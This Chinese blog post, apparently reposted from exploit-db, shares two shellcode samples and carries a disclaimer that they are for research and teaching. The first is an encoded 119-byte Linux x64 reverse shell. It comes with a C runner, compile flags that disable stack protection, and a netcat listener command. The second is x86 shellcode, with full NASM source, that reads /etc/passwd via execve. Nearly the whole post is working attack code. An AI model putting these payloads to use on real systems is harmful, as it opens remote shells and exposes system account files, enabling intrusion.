[shellcode分享]Linux/x64 - 反向 (0.0.0.0:1907/TCP) Shell Shellcode (119 字节)

Posted 2022-05-02 鸿渐之翼

免责声明：
本POC程序仅供安全研究与教学之用，使用者将其信息做其他用途，由使用者承担全部法律及连带责任，CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。
Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)

*
reverse shell tcp (1907) port shellcode C language - Linux/x86_64
 
    Author : Kağan Çapar
    contact: kagancapar@gmail.com
    shellcode len : 119 bytes
    compilation: gcc -fno-stack-protector -z execstack reverse-shell.c -o reverse-shell
    
    Test:
    run your machine: nc -vlp 1907
    and run exploit (./reverse-shell)
    check shellcode raw and test ls, who, pwd command.
 
 
:       0x48    0x31    0xc9    0x48    0x81    0xe9    0xf6    0xff
: 0xff    0xff    0x48    0x8d    0x05    0xef    0xff    0xff
:    0xff    0x48    0xbb    0xdf    0x4b    0x06    0xb1    0x71
:    0x71    0x46    0x28    0x48    0x31    0x58    0x27    0x48
:    0x2d    0xf8    0xff    0xff    0xff    0xe2    0xf4    0xb5
:    0x62    0x5e    0x28    0x1b    0x73    0x19    0x42    0xde
:    0x15    0x09    0xb4    0x39    0xe6    0x0e    0x91    0xdd
:    0x4b    0x01    0xc2    0x0e    0x71    0x46    0x29    0x8e
:    0x03    0x8f    0x57    0x1b    0x61    0x1c    0x42    0xf5
:    0x13    0x09    0xb4    0x1b    0x72    0x18    0x60    0x20
:    0x85    0x6c    0x90    0x29    0x7e    0x43    0x5d    0x29
:    0x21    0x3d    0xe9    0xe8    0x39    0xfd    0x07    0xbd
:    0x22    0x68    0x9e    0x02    0x19    0x46    0x7b    0x97
:   0xc2    0xe1    0xe3    0x26    0x39    0xcf    0xce    0xd0
:   0x4e    0x06    0xb1    0x71    0x71    0x46    0x28
 
    
assembly code is below:
 
xor    %rcx,%rcx
sub    $0xfffffffffffffff6,%rcx
lea    -0x11(%rip),%rax                 # 0x555555558060
movabs $0x28467171b1064bdf,%rbx
xor    %rbx,0x27(%rax)
sub    $0xfffffffffffffff8,%rax
loop   0x55555555807b
mov    $0x62,%ch
pop    %rsi
sub    %bl,(%rbx)
jae    0x5555555580a7
rex.X ficoms -0x19c64bf7(%rip)          # 0x55553b8f349e
xchg   %eax,%ecx
fisttpll 0x1(%rbx)
retq   $0x710e
rex.RX sub %r9d,0x1b578f03(%rsi)
(bad) 
sbb    $0x42,%al
cmc   
adc    (%rcx),%ecx
mov    $0x1b,%ah
jb     0x5555555580c6  
and    %al,0x7e29906c(%rbp)
rex.XB pop %r13
sub    %esp,(%rcx)
cmp    $0xfd39e8e9,%eax 
mov    $0x29e6822,%ebp
sbb    %eax,0x7b(%rsi)
xchg   %eax,%edi
retq   $0xe3e1
es cmp %ecx,%edi
rorb   0x6(%rsi)
mov    $0x71,%cl
jno    0x55555555811c
sub    %al,(%rax)
   
 
*/
 
#include
#include
 
unsigned char shellproccod[] = \\
"\\x48\\x31\\xc9\\x48\\x81\\xe9\\xf6\\xff\\xff\\xff\\x48\\x8d\\x05\\xef\\xff"
"\\xff\\xff\\x48\\xbb\\xdf\\x4b\\x06\\xb1\\x71\\x71\\x46\\x28\\x48\\x31\\x58"
"\\x27\\x48\\x2d\\xf8\\xff\\xff\\xff\\xe2\\xf4\\xb5\\x62\\x5e\\x28\\x1b\\x73"
"\\x19\\x42\\xde\\x15\\x09\\xb4\\x39\\xe6\\x0e\\x91\\xdd\\x4b\\x01\\xc2\\x0e"
"\\x71\\x46\\x29\\x8e\\x03\\x8f\\x57\\x1b\\x61\\x1c\\x42\\xf5\\x13\\x09\\xb4"
"\\x1b\\x72\\x18\\x60\\x20\\x85\\x6c\\x90\\x29\\x7e\\x43\\x5d\\x29\\x21\\x3d"
"\\xe9\\xe8\\x39\\xfd\\x07\\xbd\\x22\\x68\\x9e\\x02\\x19\\x46\\x7b\\x97\\xc2"
"\\xe1\\xe3\\x26\\x39\\xcf\\xce\\xd0\\x4e\\x06\\xb1\\x71\\x71\\x46\\x28";
 
int main()

    printf("Shellcode len: %d\\n", strlen(shellproccod));
    
    int (*ret)() = (int(*)())shellproccod;
    
    ret();
    

Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode（61 字节）
; Exploit Title: /usr/bin/head -n99 cat etc/passwd (poly shellcode-571.php)
; Date: November 29th, 2018
; Exploit Author: Nelis
; Version: 0.2
; Tested on: Ubuntu 12.10
; Filename: headpass.nasm
; SLAE-ID: 1327
; Based on: http://shell-storm.org/shellcode/files/shellcode-571.php
 
; Shellcode:"\\x29\\xc0\\x50\\x68\\x73\\x73\\x77\\x64\\x68\\x63\\x2f\\x70\\x61\\x68\\x2f\\x2f\\x65\\x74\\x89\\xe6\\x50\\x68\\x2d\\x6e\\x39\\x39\\x89\\xe7\\x50\\x68\\x68\\x65\\x61\\x64\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x68\\x2f\\x75\\x73\\x72\\x89\\xe3\\x50\\x57\\x56\\x53\\xb0\\x0b\\x89\\xe1\\xcd\\x80"
 
 
 
global _start          
 
section .text
_start:
 
    sub eax, eax            ; changed from xor eax, eax
 
    push eax                        ; put 0-term on stack
        push dword 0x64777373           ; dwss
        push dword 0x61702f63           ; ap/c
        push dword 0x74652f2f           ; te//
    mov esi, esp            ; save addr of stack into esi
 
    push eax
    push dword 0x39396e2d           ; 99n-
    mov edi, esp            ; save addr of stack into edi
    
    push eax
    push dword 0x64616568       ; daeh
    push dword 0x2f6e6962       ; /nib
    push dword 0x2f2f2f2f       ; 
    push dword 0x7273752f       ; rsu/ changed from cat to head command
    mov ebx,esp         ; unchanged (save addr of stack into into ebx)
 
;   mov edx, eax            ; set edx to NULL / not already 0x0 / keeping it here in case you encouter issues with it
    push eax            ; 0-term on stack
    push edi            ; added for args
    push esi            ; added for args
    push ebx            ; pointer to /userbin/head
 
    mov al, 0xb                     ; set syscall execve
    mov ecx,esp         ; move stack pointer into ecx
    int 0x80            ; make syscall